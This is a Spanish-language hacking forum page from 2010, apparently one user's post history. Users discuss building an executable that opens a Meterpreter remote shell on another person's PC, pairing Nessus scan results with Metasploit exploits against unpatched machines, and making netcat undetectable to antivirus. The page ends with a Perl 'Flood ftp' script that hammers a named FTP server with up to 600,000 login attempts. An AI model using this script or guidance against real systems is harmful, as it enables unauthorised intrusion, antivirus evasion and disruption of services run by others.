Buenas,preguntaba si hay alguna forma de generar un exe, y pasarlo a otra pc, y cuando ese .exe se ejecute, obtenga remote shell meterpreter ?? ..
saludos,PHAMTOM.
saludos,PHAMTOM.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: beholdthe en 22 Marzo 2010, 03:50 AMAver.. aver.. aver..Cita de: PHAMTOM en 22 Marzo 2010, 02:43 AMmuchas gracias de nuevoCita de: beholdthe en 22 Marzo 2010, 02:22 AMCita de: Alex@ShellRoot en 22 Marzo 2010, 01:31 AMexacto!! pero ese es mi problema... no se como pasar la informacion del nessus a el exploit que debo utilizar
Tenes algunos conceptos truncados. El payload podes usar el que se te dé la reverenda gana, (Solo soportados por el exploits, más informacion show payloads). El exploit, es él que tenes que buscar, dependiendo del reporte que te generé el Nessus!.
me han dicho que me olvide del plugin id y que me centre en el cve, pero aun asi sigo sin poder buscar o relacionar una informacion (nessus ) con un exploit
gracias de nuevo alex
Por este foro,creo haber visto un manual por shellroot , de como pasar el resultado del nessus o nmap a metasploit , en una base de datos..
Antes de explotar una vulnerabilidad tienes que ver muchas cosas, primero , el target, que sea vulnerable, los puertos abiertos,evitar un router,windows no updatado,tienes que estar 100% seguro que el servicio que intentas atacar no esta filtrado , o bloqueado..lee sobre pasar resultados de nessus o nmap a msf , y después comenta que tal te fue.Saludos.
PD : NO ESCAPES DEL NMAP , TE DA MUCHA INFORMACIÓN,PUEDES SACAR EL SO , LOS PUERTOS, SU ESTADO ( OPEN O FILTERED ) , EL SERVICIO Y MÁS.
PHAMTOM
probare todas esas cosas, pero ufffff tal y como me lo poneis, realmente creo q entrar en un ordenador de esta forma es algo imposible, probare a instalar mas adelante un xp nuevo, que no este parcheado o actualizado o lo que sea.
realmente a un usuario normal que actualice de vez en cuando etc etc SE LE PUEDE ENTRAR ASI¿?¿?¿? porque tal y como lo poneis, lo veo muy dificil ( hablando desde mi ignorancia claro esta )
y alguien que utilize ubuntu¿?¿ porque si en un xp ya lo veo complicado en ubuntu.... pero bueno igual estoy equivocado, asi q aclararme esto
muchas gracias
Cita de: beholdthe en 22 Marzo 2010, 02:22 AMCita de: Alex@ShellRoot en 22 Marzo 2010, 01:31 AMexacto!! pero ese es mi problema... no se como pasar la informacion del nessus a el exploit que debo utilizar
Tenes algunos conceptos truncados. El payload podes usar el que se te dé la reverenda gana, (Solo soportados por el exploits, más informacion show payloads). El exploit, es él que tenes que buscar, dependiendo del reporte que te generé el Nessus!.
me han dicho que me olvide del plugin id y que me centre en el cve, pero aun asi sigo sin poder buscar o relacionar una informacion (nessus ) con un exploit
gracias de nuevo alex
Cita de: Alex@ShellRoot en 16 Marzo 2010, 19:37 PM
1. A de ser uno muy idiota para recibir 2 archivos y más con nombre nc.exe
2. Nunca he visto algo como esto, se enviand 2 archivo. Debe ser 1 archivo por lo menos.
Cita de: Full Metal Jacket en 16 Marzo 2010, 20:01 PM
Tutorial, basico entendible bueno para los que recien emoiezan, pero hay que poner algo claro el NC es detectado por casi todos los AVS, lo cual primero tendrias dejar 100% FUD el nc y de ahi realizar todo el procedur*
#Logo
print q(
Flood ftp
);
use Net::FTP;
#Create user and pass
my $contador=0;
my $userpass="AAAAAA";
do
{
print("Intentos : $contador");
$userpass x 1;
$contador++;
my $ftp = Net::FTP->new("ftp.jamaikamu.com") or die("No se pudo conectar al servidor: $!");
$ftp->login($userpass,$userpass);
print("Login incorrecto");
#ACCIONES QUE QUEREMOS EJECUTAR EN EL SERVIDOR
$ftp->quit or die("No se puedo desconectar del servidor: $!");
print("Intentos : $contador");
} until($contador > 600000);